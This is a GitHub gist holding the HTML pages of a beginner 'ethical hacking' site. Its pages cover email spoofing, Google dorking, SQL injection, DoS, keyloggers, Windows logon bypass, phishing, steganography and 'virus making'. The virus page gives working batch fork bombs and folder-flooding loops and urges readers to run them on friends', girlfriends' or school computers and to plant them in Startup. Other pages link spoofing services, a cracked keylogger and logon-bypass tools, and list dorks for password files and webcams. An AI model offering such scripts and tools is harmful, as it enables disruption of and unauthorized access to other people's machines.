Skip to content

Instantly share code, notes, and snippets.

@yashbedi
Created April 20, 2013 17:31
Show Gist options
  • Save yashbedi/5426749 to your computer and use it in GitHub Desktop.
Save yashbedi/5426749 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head><title>content list</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<link href='http://fonts.googleapis.com/css?family=Metal Mania:400,300' rel='stylesheet' type='text/css'>
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body><hr>
<div id="page">
<div class="post">
<div class="entry">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
ethical hacking is <b>legal</b> or <b>il-legal</b> ?</p>
<br>
<p id="dust">The Certified Ethical Hacker is a professional certification provided by the International Council of E-Commerce Consultants (EC-Council.)
An ethical hacker is usually employed by an organization who trusts him or her to attempt to penetrate networks and/or computer systems, using the same methods as a hacker, for the purpose of finding and fixing computer security vulnerabilities. Unauthorized hacking (i.e., gaining access to computer systems without prior authorization from the owner) is a crime in most countries, but penetration testing done by request of the owner of the vicitim system(s) or network(s) is not.
A Certified Ethical Hacker has obtained a certification in how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a hacker.
The exam code for C|EH is 312-50. The certification is in Version 7.1 as of 14 June 2011. A version 8 has later been added.
The EC-Council offers another certification, known as Certified Network Defense Architect (C|NDA). This certification is designed for United States Government Agencies, and is available only to members of selected agencies. Other than the name, the content of the course is exactly the same. The exam code for C|NDA is 312-99.<br>
read more on <sub><a href="http://en.wikipedia.org/wiki/Certified_Ethical_Hacker"><img src="images/wiki.jpg" width="25" height="25"></a></sub><b>ikipedia</b><strongp>
<p id="wrapper">
content list !</p>
<p id="fish">
<ul>
<li><a href="email.html">E-mail exploitation</a></li><br>
<li><a href="os.html">Os-hacking</a></li><br>
<li><a href="steg.html">Stegnography</a></li><br>
<li><a href="phish.html">Phishing</a></li><br>
<li><a href="key.html">Keyloggers</a></li><br>
<li><a href="Virus.html">virus'es</a></li><br>
<li><a href="internet.html">Internet attacks</a></li><br>
<li><a href="ghdb.html">GHDB (google hacking database )</a></li>
</ul><br>
</p>
<hr width=40% align=justify size=1>
<p id="bear">
before clicking on any link; <b><u>read this !!</u></b><br>
Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law. This site contains materials that can be potentially damaging or dangerous.If you do not fully understand something on this site, then <b>GO OUT OF HERE!</b> Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention,then <b>LEAVE NOW!</b> Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions.</p>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
<div class="up">
<div>
<a href="#"><img src="images/up.jpg" width="45" height="45"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>e-mail exploitation</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
e-mail spoofing !</p><br>
<p id="dust">
Email spoofing is email activity in which the sender address and other parts of the email header are altered to appear as though the email originated from a different source. Because core SMTP doesn't provide any authentication, it is easy to impersonate and forge emails.
Although there may be legitimate reasons to spoof an address, these techniques are commonly used in spam and phishing emails to hide the origin of the email message.
A number of measures to address spoofing have been proposed, including: SPF, Sender ID, DKIM, and DMARC, and these are now widely implemented.<br>
<br><b>Technical detail</b></p>
<hr width=40% align=left size=1>
<p id="dust">
By altering an email's identifying fields, such as the From, Return-Path and Reply-To (which can be found in the message header), emails can be made to appear to be from someone other than the actual sender.
Occasionally (especially if the spam requires a reply from the recipient, as in advance-fee frauds), the source of the spam email is indicated in the Reply-To field (or at least a way of identifying the spammer); if this is the case and the initial email is replied to, the delivery will be sent to the address specified in the Reply-To field, which could be the spammer's address. However, most spam emails (especially malicious ones with a trojan/virus payload, or those advertising a web site) forge this address too, and replying to it will annoy an innocent third party.
Prior to the advent of unsolicited commercial email (spam) as a viable business model, "legitimately spoofed" email was common. For example, a visiting user might use the local organization's SMTP server to send email from the user's foreign address. Since most servers were configured as open relays, this was a common practice. As spam email became an annoying problem, most of these "legitimate" uses fell victim to antispam techniques.
It is much more difficult to spoof or hide the IP or Internet Protocol address. The IP address is a 32 or 128 bit numerical label assigned to each device participating in a network and originates through the network provider making it more difficult to spoof or hide. Although this kind of verification is difficult for individual users, companies can use this technology as well as others such as cryptographic signatures (e.g., PGP "Pretty Good Privacy" or other encryption technologies) to exchange authenticated email messages. Authenticated email provides a mechanism for ensuring that messages are from whom they appear to be, as well as ensuring that the message has not been altered in transit. Similarly, sites may wish to consider enabling SSL/TLS in their mail transfer software. Using certificates in this manner increases the amount of authentication performed when sending mail.<br><br>
<b>Methods</b></p>
<hr width=40% align=left size=1>
<p id="dust">
Because many spammers now use special software to create random sender addresses, even if the user finds the origin of the email it is unlikely that the email address will be active.
The technique is now used ubiquitously by bulk email software as a means of concealing the origin of the propagation. On infection, worms such as ILOVEYOU, Klez and Sober will often try to perform searches for email addresses within the address book of a mail client, and use those addresses in the From field of emails that they send, so that these emails appear to have been sent by the third party. For example:
Alice is sent an infected email and then the email is opened, triggering propagation.
The worm finds the addresses of Bob and Charlie within Alice's address book.
From Alice's computer, the worm sends an infected email to Bob, but the email appears to have been sent by Charlie.
This can be particularly problematic in a corporate setting, where email is sent to organisations with content filtering gateways in place. These gateways are often configured with default rules that send reply notices for messages that get blocked, so the example is often followed by:
Bob doesn't receive the message, but instead gets a message telling him that a virus sent to him has been blocked. Charlie receives a message telling him that a virus sent by him has been blocked. This creates confusion for both Bob and Charlie, while Alice remains unaware of the actual infection.
Newer variants of these worms have built on this technique by randomising all or part of the email address.</p><br>
<p id="wrapper">
fake mailing websites !</p><hr width=40% align=justify size=1>
<ul>
<li><a href="http://emkei.cz/">emkei.cz<a/></li><br>
<li><a href="http://fakesend.com/index.asp">fakesend.com</a></li><br>
<li><a href="http://deadfake.com/">deadfake.com</a></li>
</ul><br><br><br>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
<div class="up">
<div>
<a href="#"><img src="images/up.jpg" width="45" height="45"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>GHDB</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:underline;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:underline;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
GHDB !<br>
google hacking database</p><br>
<p id="dust">
Google hacking is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use<br><br>
Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file.</p>
<pre>
intitle:admbook intitle:version filetype:php</pre>
<p id="dust">
One can even retrieve the username and password list from Microsoft FrontPage servers by inputting the given microscript in Google search field:</p>
<pre>
"#-Frontpage-" inurl:administrators.pwd</pre>
<p id="dust">
devices connected to the Internet can be found. A search string such as</p> <pre>inurl:"ViewerFrame?Mode="</pre>
<p id="dust">
will find public web cameras.
Another Useful Search is following</p>
<pre>intitle:index.of </pre>
<p id="dust">followed by whatever you want to search. This can give list of files on the servers.For example</p>
<pre>intitle:index.of mp3</pre>
<p id="dust">
will give all the mp3 file available on various servers.<br>
read more on<a href="http://en.wikipedia.org/wiki/Google_hacking"><sub><img src="images/wiki.jpg" width="30" height="30"></sub></a>ikipedia.<a href="ghdb.pdf">click here to get more info on <b>GHDB</b></a>.
</p>
<br><br><br>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
<div class="up">
<div>
<a href="#"><img src="images/up.jpg" width="45" height="45"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>internet attacks</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:underline;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:underline;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
website attacks !</p><br><br>
<h2>sql injection</h2>
<hr width=25% size=1 align=left>
<p id="dust">
SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.<br>
<b>In operational environments, it has been noted that applications experience an average of 71 attempts an hour.</b><br><br></p>
<h3>Technical<br>implementation</h3>
<hr width=25% size=1 align=left><p id="dust">
This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application.
The following line of code illustrates this vulnerability:</p>
<pre>
a'or'1'='1
</pre>
<p id="dust">
This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended.</p><br>
<h2>dos attack </h2>
<hr width=25% size=1 align=left>
<p id="dust">
In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games such as Minecraft. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.<br><br>
One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.<a href="dos.pdf">click here to get more info on <b>dos attack</b></p><br><br>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
<div class="up">
<div>
<a href="#"><img src="images/up.jpg" width="45" height="45"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>keyloggers</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
key-loggers !
</p>
<br>
<p id="dust">
Keylogger ( called "key" - the key , "log" - log) - the type of software or device that collects and stores information about the keys the pressure on the user computer .
These programs work by taking control procedures operating system serving to handle keyboard . Each key press is recorded in a special file . Optional information about the pressed keys are extended with additional information, such as name of the active application or window.
Keyloggers include features to protect them from detection by inexperienced computer user, and the file that records the data secret is in your system directories. Thanks to this long can reside undetected on the victim and contribute to disclose all passwords used. Most keyloggers are designed as a special feature that allows you to send the password file to a designated email address.<br><br>
Hardware keyloggers are in the form of small adapters designed to attach to the keyboard port on your computer. The keyboard is plugged on then to the adapter, which then records all keystrokes built-in memory or send it by radio. In the case of the first type of keylogger is required physical access to the device to read the data. You can also find a built-in hardware keylogger keyboard or cable connecting the keyboard to the computer.
</p><br><br>
<p id="wrapper">
tools !
</p>
<hr width=40% align=justify size=1>
<p id="dust">
<ul>
<li><a href="http://www.hackthepc.org/2011/04/ardamax-keylogger-v376-full-free-crack.html">ardamax key-logger.</a></li><br><br>
<li><a href="http://www.logixoft.com/free-keylogger-download">revealer</a></li>
</p><br><br><br>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100"
s
height="100"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Os-hacking</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
os-hacking !
</p>
<br>
<p id="dust">
An operating system (OS) is a collection of software that manages computer hardware resources and provides common services for computer programs. The operating system is a vital component of the system software in a computer system. Application programs usually require an operating system to function.
Time-sharing operating systems schedule tasks for efficient use of the system and may also include accounting for cost allocation of processor time, mass storage, printing, and other resources.
For hardware functions such as input and output and memory allocation, the operating system acts as an intermediary between programs and the computer hardware, although the application code is usually executed directly by the hardware and will frequently make a system call to an OS function or be interrupted by it. Operating systems can be found on almost any device that contains a computer—from cellular phones and video game consoles to supercomputers and web servers.
Examples of popular modern operating systems include Android, BSD, iOS, Linux, Mac OS X, QNX, Microsoft Windows, Windows Phone, and IBM z/OS. All these, except Windows and z/OS, share roots in UNIX.</p>
<br>
<p id="wrapper">
hacking tools !</p>
<hr width=40% align=justify size=1>
<ul><p id="dust">
<li><a href="http://www.freedownloadzone.in/2012/03/download-kon-boot-free-full-version.html">konboot</a><br>
<b>descrpition </b>: windows logon screen bypassing tool</li><br><br>
<li><a href="http://pogostick.net/~pnh/ntpasswd/">nt-offline password cracker</a><br>
<b>descrpition </b>: windows logon screen bypassing & Registry Editor tool</li><br><br>
</p></ul>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>phishing</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Julius Sans One' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Julius Sans One' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Julius Sans One' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
phishing !
</p>
<br>
<p id="dust">
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.<br><br>
A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.
<br><br>
A phishing technique was described in detail, in a paper and presentation delivered to the International HP Users Group, Interex.The first recorded mention of the term "phishing" is found in the hacking tool AOHell (according to its creator), which included a function for stealing the passwords of America Online users.A recent and popular case of phishing is the suspected Chinese phishing campaign targeting Gmail accounts of highly ranked officials of the United States and South Korean’s Government, military, and Chinese political activists.The Chinese government continues to deny accusations of taking part in cyber-attacks from within its borders, but evidence has been revealed that China’s own People’s Liberation Army has assisted in the coding of cyber-attack software.
</p>
<br><br><br>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>stegnography</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Economica' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Economica' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
steganography !<br>
description : hiding your data behind an image.
</p>
<br>
<p id="dust">
<b>Steganography</b> is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. The word steganography is of Greek origin and means <b>“concealed writing”</b> from the Greek words steganos (????????) meaning <b>“covered or protected”</b>, and <b>graphei</b> (?????) meaning <b>“writing”</b>. The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other covertext and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.
<b>Steganography</b> here is shown using <b>command prompt</b> it is the easy and best way to do steganography.
Using it one can hide any data behind any other file.
Now here m going to show how Steganography Hiding Secret File Inside an Image Using <b>CMD</b> is done in PC world :<br>
<br>
<p id="wrapper">
steps required !
</p>
<hr width=30% align=justify size=1>
<ol>
<li>first of all you need a winrar archiver if you dont have download it.then choose a file like a video file(.3gp, .avi, .mp4, etc..)or a mp3 file or any other file which you want to hide copy that/them to desktop.</li><br><br>
<li>right click on that file or no. of files select >> add to desktop.rar</li><br><br>
<li>select any image file with extention .jpg copy it to desktop</li><br><br>
<li>Open your command prompt (go to Start>>Run then type cmd in run >> press enter)</li><br><br>
<li>Next step we will use the command prompt to join these two file.<br>
type "cd desktop" (without quotes) & hit enter.<br>
then type "copy /b image_name.jpg+desktop.rar new_image_name.jpg" (without quotes) & hit enter.<br>
e.g. : copy /b apple.jpg+desktop.rar new.jpg</li><br><br>
<li>thats it ! you are done .</li><br><br>
<li>Now how to view the content that we have hidden.Actually there r two steps you can do to view the content :<br>
a. change the file extension from new.jpg to new.rar and just open using your WinRar application and your file is there.<br>
b. right click new.jpg and choose open with WinRar and your secret file is there.<br><br><br>
<div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
<div class="up">
<div>
<a href="#"><img src="images/up.jpg" width="45" height="45"></a></div></div>
</p>
</div></div></div>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>virus making</title>
<link href='http://fonts.googleapis.com/css?family=Julius Sans One:400,300' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Special Elite|Satisfy' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Economica:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href="file.css" media="all" />
<style>
a:link { font-family: 'Julius Sans One' ,sans-serif;
color:black;
text-decoration:none;
}
a:visited {
font-family: 'Julius Sans One' ,sans-serif;
color:black;
text-decoration:none;
}
a:hover {
font-family: 'Julius Sans One' ,sans-serif;
font-size:20px;
color:#FF1975;
text-decoration:none;
}
</style>
</head>
<body>
<hr>
<div id="page">
<div class="post">
<div class="entry">
<p id="hi">
<a href="index.html"><img src="images/home.jpg" width="40" height="40"></a></p>
<a href="contentlist.html"><img src="images/back.jpg" width="40" height="40"></a>
<br>
<p id="wrapper">
virus making using notepad !</p><br>
<p id="dust">
Do you want to create your own computer virus. Do you want to trick your friends and make their computers go crazy and even shutdown? Maybe you just want to make a prank on your schools/college computers. Well you’re in the right place but don’t forget I am not responsable of anything you do with the following tutorial ;)<br>
<br>first of all open notepad by clicking on the start button >> then write notepad in the run column n hit enter.so i guess u r all set to write the code. it all begins with<br></p>
<pre>@echo off</pre><p id="dust">( displays msgs or turns command echoing on or off)
<br>below this command whatever you will write everything will be displayed in command the prompt.
<br>i knw people hate reading big stories so lets <b>cut the crap</b> n begin with our 1st virus !<br></p>
<pre>
@echo off
:hello
msg * i love you baby !!
goto hello</pre>
<p id="dust">
save this virus with anything.bat n u r set, run this virus in your girlfriend's pc or friends pc n see the changes i am sure you will definetly gonna enjoy that scenario:D
<br>
in this virus i hav used goto statement which on execution of the virus calls :hello infinte times.<br>
this is the 2nd virus :</p>
<pre>
@echo off
:hell
md %random%
goto hell
</pre>
<p id="dust">
this is a superb virus which infinetly creates thousands of folders wherever it is executed ,n it is not a funny virus so <b>beware</b> !! before executing it on your pc !<br></p>
<p id="dust">this is the 3rd one which is easy n <b>replicable</b> !</p>
<pre>
start anything.bat
anything.bat
</pre>
<p id="dust">this code which seems to be very short but has a <b>commodious impact</b> on the pc,.wondering how?? run it n see the change .<br>
this "anything" can be replaced by anything :D what u feel like .<br>
another one this is my favourite one so i always save it with yash.bat ;D becoz this virus will hold your breaths for a while (y).</p>
<pre>
start yash.bat
:sexy
start notepad.exe
start calc.exe
start mspaint.exe
start iexplorer.exe
goto sexy
yash.bat
</pre>
<p id="dust">
save this virus with yash.bat n u r done.
this virus opens number of windows of <b>cmd , notepad , mspaint , calculator & iexplorer </b>.which eats up all the processing memory i.e. <b>RAM</b>. just put this virus in some1's pc follow this path { click on start>>all programs>>startup} & whenever the pc is turned on this virus will automatically execute itself n its a <b>replicating </b>one .</p>
<br><br><br><div class="pic">
<div>
<a href="http://www.facebook.com/yshu.rcks"><img src="images/yb.png" width="100" height="100"></a></div></div>
<div class="up">
<div>
<a href="#"><img src="images/up.jpg" widths="45" height="45"></a></div></div>
</div></div></div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment